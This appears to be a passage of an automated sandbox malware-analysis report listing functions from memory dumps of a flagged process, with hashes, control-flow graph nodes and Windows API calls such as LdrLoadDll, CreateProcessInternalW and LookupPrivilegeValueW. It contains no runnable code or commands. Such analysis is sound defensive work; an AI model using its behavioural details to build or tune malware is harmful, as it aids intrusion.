              • Opcode ID: e02530962bb8d953c6b68bfd4780b3697f3f21a0a11fd77ad7635e9eaa7541b2
              • Instruction ID: b15118f1284df16785029aab5c59f1df5633e42e6c6b3a10c04ce01aeb06bca0
              • Opcode Fuzzy Hash: e02530962bb8d953c6b68bfd4780b3697f3f21a0a11fd77ad7635e9eaa7541b2
              • Instruction Fuzzy Hash: 2B9002A5211051032105A5590714507054797D6395361C421F1016551CD661E8617161
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C09910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: ff1e142d885b05431eca574ea6d6b4da154ab20aaee4457ad0014ba171a9be2a
              • Instruction ID: 5d03e5ff08873c1120caaa2d126a4d44fb6872b5f622ade34a5f0da48af46df2
              • Opcode Fuzzy Hash: ff1e142d885b05431eca574ea6d6b4da154ab20aaee4457ad0014ba171a9be2a
              • Instruction Fuzzy Hash: 409002F120105502F14071594414746050697D1345F61C411A5065555E8699EDD576A5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C096D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: c91d909fbdda112edf01de8a20b9fb71939a65d5ce87790d6937cf99bbd19596
              • Instruction ID: 2cfa8624042bebe50c84c5402cc536be48f77594d15e35b694f0d897abaec50d
              • Opcode Fuzzy Hash: c91d909fbdda112edf01de8a20b9fb71939a65d5ce87790d6937cf99bbd19596
              • Instruction Fuzzy Hash: 059002B120105942F10061594414B46050697E1345F61C416A0125655D8655E8517561
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C096E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: db4115214d08c19be56e91fed4486740d85d480117578abdaf5f7485aea8fddd
              • Instruction ID: ef120ddf17543fb09421a2a47c3843c2d09fd3130195afbb84032899d4e8489f
              • Opcode Fuzzy Hash: db4115214d08c19be56e91fed4486740d85d480117578abdaf5f7485aea8fddd
              • Instruction Fuzzy Hash: 6C9002B12010D902F1106159841474A050697D1345F65C811A4425659D86D5E8917161
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C09650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 20fc3e25a6dfdbad342766f8396dec51387d8fd69763540d5d7718360e0a2337
              • Instruction ID: c6d39c4e8f4d7dad5eea3d975438702e3d4c79aa7fd94c6f321db7b499960dac
              • Opcode Fuzzy Hash: 20fc3e25a6dfdbad342766f8396dec51387d8fd69763540d5d7718360e0a2337
              • Instruction Fuzzy Hash: 6C9002B120509942F14071594414A46051697D1349F61C411A0065695D9665ED55B6A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C09A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 1e2f1611870cdc0503a4bbf9b0ce5a79ed055cb9c3245d61dbc989169883c499
              • Instruction ID: 83a429e6af6a6520aed56b419184a21c1594167f8b539b80f35a2059dcaad688
              • Opcode Fuzzy Hash: 1e2f1611870cdc0503a4bbf9b0ce5a79ed055cb9c3245d61dbc989169883c499
              • Instruction Fuzzy Hash: 809002A121185142F20065694C24B07050697D1347F61C515A0155555CC955E8617561
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C09660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e705e4a397457540e603b292d33eec8e3864cc4d3f950914a209e3beced20c69
              • Instruction ID: 27add08df6639018c6b1942f954c2e9369593a81c200bdf6e60dd8a916f9fa2c
              • Opcode Fuzzy Hash: e705e4a397457540e603b292d33eec8e3864cc4d3f950914a209e3beced20c69
              • Instruction Fuzzy Hash: B19002B120105902F1807159441464A050697D2345FA1C415A0026655DCA55EA5977E1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C09FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 561da857bd6b81b3a63774d29b478a4f22b0bcfa89e497b6540216640dd8f68c
              • Instruction ID: 0a26e2ca93dee986f0c5ce1115b4fea161ca02cf4fe076ce74a18e890ad067b1
              • Opcode Fuzzy Hash: 561da857bd6b81b3a63774d29b478a4f22b0bcfa89e497b6540216640dd8f68c
              • Instruction Fuzzy Hash: 869002B131119502F11061598414706050697D2245F61C811A0825559D86D5E8917162
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C09780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2d2d67f57076c949ccfdb9ffcfb254dad1f31325f9804f1f67bd1a4744be4f62
              • Instruction ID: 3ec869d8d60f04c4e5c99b5040a682e407f325ce057f41e7b0e2d8296f6e89e9
              • Opcode Fuzzy Hash: 2d2d67f57076c949ccfdb9ffcfb254dad1f31325f9804f1f67bd1a4744be4f62
              • Instruction Fuzzy Hash: 199002A921305102F1807159541860A050697D2246FA1D815A0016559CC955E8697361
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C09710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: c9fc837cb64abe10f78acaac968208c00677783c92b6bfd13f016d7d3d97e6ff
              • Instruction ID: 8051091d307fd68f103bad1d86c7a39d961de319800f70b6c38d26c486e7d0da
              • Opcode Fuzzy Hash: c9fc837cb64abe10f78acaac968208c00677783c92b6bfd13f016d7d3d97e6ff
              • Instruction Fuzzy Hash: E99002B120105502F10065995418646050697E1345F61D411A5025556EC6A5E8917171
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EF9030 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 393 2ef9030-2ef905f 394 2ef906b-2ef9072 393->394 395 2ef9066 call 2efbe60 393->395 396 2ef914c-2ef9152 394->396 397 2ef9078-2ef90c8 call 2efbf30 call 2eea130 call 2ef5a90 394->397 395->394 404 2ef90d0-2ef90e1 Sleep 397->404 405 2ef9146-2ef914a 404->405 406 2ef90e3-2ef90e9 404->406 405->396 405->404 407 2ef90eb-2ef9111 call 2ef8c60 406->407 408 2ef9113-2ef9133 406->408 409 2ef9139-2ef913c 407->409 408->409 410 2ef9134 call 2ef8e60 408->410 409->405 410->409
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 02EF90D8
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: 07fdd80105d5b63d1dba8c9a26231a7f70bed6a3a37cd6b328bfeaf2080a0caa
              • Instruction ID: 0f169aaeca2eb11958250cf89e65e89a13022637191330716eff48e9f5698442
              • Opcode Fuzzy Hash: 07fdd80105d5b63d1dba8c9a26231a7f70bed6a3a37cd6b328bfeaf2080a0caa
              • Instruction Fuzzy Hash: 41319EB2642704ABD721DF68C8A0FA7B7B9BF88704F00C12DF65A9B241D770B445CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EF9026 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 413 2ef9026-2ef9072 call 2efbe60 416 2ef914c-2ef9152 413->416 417 2ef9078-2ef90c8 call 2efbf30 call 2eea130 call 2ef5a90 413->417 424 2ef90d0-2ef90e1 Sleep 417->424 425 2ef9146-2ef914a 424->425 426 2ef90e3-2ef90e9 424->426 425->416 425->424 427 2ef90eb-2ef9111 call 2ef8c60 426->427 428 2ef9113-2ef9133 426->428 429 2ef9139-2ef913c 427->429 428->429 430 2ef9134 call 2ef8e60 428->430 429->425 430->429
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 02EF90D8
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: 3c92c9aa853b7663327822060b4870b0c89b09bb903de273b89bbb619ce4daa6
              • Instruction ID: c5423ccedf2fa6fc840d6417bfae8bdefd25f6411ca282f3bdc16184447799dd
              • Opcode Fuzzy Hash: 3c92c9aa853b7663327822060b4870b0c89b09bb903de273b89bbb619ce4daa6
              • Instruction Fuzzy Hash: 1021CEB1641704ABC710DF64C8D0FABBBB9AF48704F00C12DF6195B242D370A445CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EE7678 Relevance: 3.1, APIs: 2, Instructions: 59threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 433 2ee7678-2ee768f 434 2ee7698-2ee76ca call 2efcb60 call 2eea130 call 2ef5a90 433->434 435 2ee7693 call 2efbf80 433->435 442 2ee76fe-2ee7702 434->442 443 2ee76cc-2ee76de PostThreadMessageW 434->443 435->434 444 2ee76fd 443->444 445 2ee76e0-2ee76fb call 2ee9890 PostThreadMessageW 443->445 444->442 445->444
              APIs
              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 02EE76DA
              • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 02EE76FB
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 47f1743a804f868d1c142f8bceb62b221fbca580b5190fb738bcd0829f36059d
              • Instruction ID: f7ae3f3adcf334553e49671f4c2f28af7530b7126ad2b0bf1bef6e7048ca7f93
              • Opcode Fuzzy Hash: 47f1743a804f868d1c142f8bceb62b221fbca580b5190fb738bcd0829f36059d
              • Instruction Fuzzy Hash: 79019C32AC02297AEB20A6908C42FFE775C9F00F44F154019FF04BA1C0E7D42A068BF4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EE7680 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 02EE76DA
              • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 02EE76FB
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: f67bdee04b0330a795eed618edd43cb063c8381520ef137713398ea470945c68
              • Instruction ID: 3cdca15212d5e3b135e35e034a67854cb2f4a5739fbc8f17561f09c1da43ad0a
              • Opcode Fuzzy Hash: f67bdee04b0330a795eed618edd43cb063c8381520ef137713398ea470945c68
              • Instruction Fuzzy Hash: 4D01A771AC022976EB20AA959C42FBEB76C9B04F54F158119FF04BA1C0EBD479054BF9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA7F1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 666 2efa7f1-2efa7f6 667 2efa7f8 666->667 668 2efa7b6-2efa7f0 call 2efaf60 666->668 669 2efa79c-2efa7b4 LookupPrivilegeValueW 667->669 670 2efa7fa-2efa814 667->670 672 2efa81a-2efa827 670->672 673 2efa815 call 2efb030 670->673 673->672
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02EED5B2,02EED5B2,?,00000000,?,?), ref: 02EFA7B0
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: fd0738ac1fd51bf59c4e04e2d774b230a6531cdc2a985629a259691ce5639772
              • Instruction ID: 63e6795f76e37d55e7e14801cbff236fdd0aed665376a1e324f7e96268fe5d4c
              • Opcode Fuzzy Hash: fd0738ac1fd51bf59c4e04e2d774b230a6531cdc2a985629a259691ce5639772
              • Instruction Fuzzy Hash: 1511A3B6600214AFDB14DFA8CC84EE77B69EF48350F15C559F95D9B342C231E910CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA772 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 677 2efa772-2efa777 678 2efa779-2efa77f 677->678 679 2efa704-2efa709 677->679 682 2efa7d6-2efa7d9 678->682 683 2efa781-2efa799 678->683 680 2efa70f-2efa724 679->680 681 2efa70a call 2efaf60 679->681 681->680 687 2efa7df-2efa7f0 682->687 688 2efa7da call 2efaf60 682->688 684 2efa79f-2efa7b4 LookupPrivilegeValueW 683->684 685 2efa79a call 2efaf60 683->685 685->684 688->687
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02EED5B2,02EED5B2,?,00000000,?,?), ref: 02EFA7B0
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 7376fb6ca21cac78634fa60254d337852cdd1e877ece9cf3ee93e3fceb11d659
              • Instruction ID: fe067f6706752bb2aeb3fe29ce7c00e613a70e20ee4dfc26e7eef9f42c396dd2
              • Opcode Fuzzy Hash: 7376fb6ca21cac78634fa60254d337852cdd1e877ece9cf3ee93e3fceb11d659
              • Instruction Fuzzy Hash: E9018EB62402086FCB10EF69DC44DE737A9EF84218F11C555FE4D4B342D631E8108AB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EEA130 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 691 2eea130-2eea159 call 2efcdb0 694 2eea15f-2eea16d call 2efd1d0 691->694 695 2eea15b-2eea15e 691->695 698 2eea16f-2eea17a call 2efd450 694->698 699 2eea17d-2eea18e call 2efb500 694->699 698->699 704 2eea1a7-2eea1aa 699->704 705 2eea190-2eea1a4 LdrLoadDll 699->705 705->704
              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02EEA1A2
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
              • Instruction ID: f8113ce8a1c5e7db500eb0e014931f8fceb6273c488a2dac2a759b313e505f31
              • Opcode Fuzzy Hash: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
              • Instruction Fuzzy Hash: 580121B5E4020DABDF10EBE4DC41FDDB7B99B44308F1091A9EA0997241F671E718CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA68E Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 02EFA6E4
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 57a27672742c05844aeefe1364824c7227a599750b68038cb86cb0939a9c65d2
              • Instruction ID: ae0323efa59b1412b391ea1c588ab8b43ec342311b4220357a85ca2441f8c40c
              • Opcode Fuzzy Hash: 57a27672742c05844aeefe1364824c7227a599750b68038cb86cb0939a9c65d2
              • Instruction Fuzzy Hash: FF019DB2214108AFCB54CF99DC80EEB77A9AF8C754F158258BA0DA7251C630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA690 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 02EFA6E4
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
              • Instruction ID: fcf0548b8f57ad4bbc91d4cf85235f599d6e12b26eb8c180fe6f28f921da8673
              • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
              • Instruction Fuzzy Hash: E501B2B2210108BFCB54DF89DC80EEB77ADAF8C754F118258BA0D97240C630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EF9160 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
              Download Yara Rule
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02EED2E0,?,?), ref: 02EF919C
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: bcc55e10a08d8f04f23789298421292f34d70b37254d9ad75765260922da6336
              • Instruction ID: a55623453774ee4b65ac8ef9ced88797f547aa63a2363179d9ba72ca2a9b25a1
              • Opcode Fuzzy Hash: bcc55e10a08d8f04f23789298421292f34d70b37254d9ad75765260922da6336
              • Instruction Fuzzy Hash: CEE092333C131437E36065A99C02FE7B78CDB84B64F55402AFB4DEB2C1E595F90146A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
              Download Yara Rule
              APIs
              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 02EFA64D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
              • Instruction ID: fdf2f35fa77b238a7c2836709b88ad677359463e1082dae1abc3d55bf062b080
              • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
              • Instruction Fuzzy Hash: 28E012B2200208ABDB14EF89DC48EA737ADEF88750F118158BA085B341C630E9108AB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA780 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02EED5B2,02EED5B2,?,00000000,?,?), ref: 02EFA7B0
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
              • Instruction ID: c2264ccb53fb4afd1478eb7f3d69f7a82c923efd48a79d128829e56507350c7e
              • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
              • Instruction Fuzzy Hash: 39E01AB22402086BDB10DF49CC44EE737ADEF89654F118164BA0C5B341C530E8148AB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA5E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(02EF5176,?,02EF58EF,02EF58EF,?,02EF5176,?,?,?,?,?,00000000,00000005,00000206), ref: 02EFA60D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
              • Instruction ID: 0d04463c694ffa205cbe9d1100d2b83253782c0e4f70317c372b9da78f88b623
              • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
              • Instruction Fuzzy Hash: C7E012B2200208ABDB14EF89DC84EAB37ADEF88654F118154BA085B341CA30F9108AB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA622 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
              Download Yara Rule
              APIs
              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 02EFA64D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: 96173d2900e5245124899023fb580c87ea31872047d3a5cd8ef449baf5e8c916
              • Instruction ID: e54fb19b7a388c5937fa425432eadb00094dc094f597cd90d2740a199f20d563
              • Opcode Fuzzy Hash: 96173d2900e5245124899023fb580c87ea31872047d3a5cd8ef449baf5e8c916
              • Instruction Fuzzy Hash: F1E046B2200204AFDB14DF59DC48EE73B69EF88350F118158FA0C9B341C630E910CAB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EFA612 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(02EF5176,?,02EF58EF,02EF58EF,?,02EF5176,?,?,?,?,?,00000000,00000005,00000206), ref: 02EFA60D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 25390f91c17b98b234e1ab0be807ce0d70dbf3980185bf3fbe2545db36cdc728
